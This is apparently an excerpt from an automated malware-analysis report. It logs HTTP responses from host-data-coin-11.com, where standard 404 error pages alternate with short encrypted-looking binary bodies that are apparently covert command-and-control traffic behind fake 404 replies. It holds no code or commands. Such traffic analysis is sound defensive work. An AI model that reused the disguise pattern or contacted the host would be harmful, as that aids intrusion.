Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:12 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: byte-identical to the 23:15:09 Apache-style 404 body above (chunk size 0x199) | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:12 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a | Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: byte-identical to the 23:15:09 Apache-style 404 body above (chunk size 0x199) | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: byte-identical to the 23:15:09 Apache-style 404 body above (chunk size 0x199) | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:15 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a | Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:15 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a | Data Ascii: 48I:82OOjQmFqdV@dfkK50
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 23:15:18 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: byte-identical to the 23:15:09 Apache-style 404 body above (chunk size 0x199) | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:13:57 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
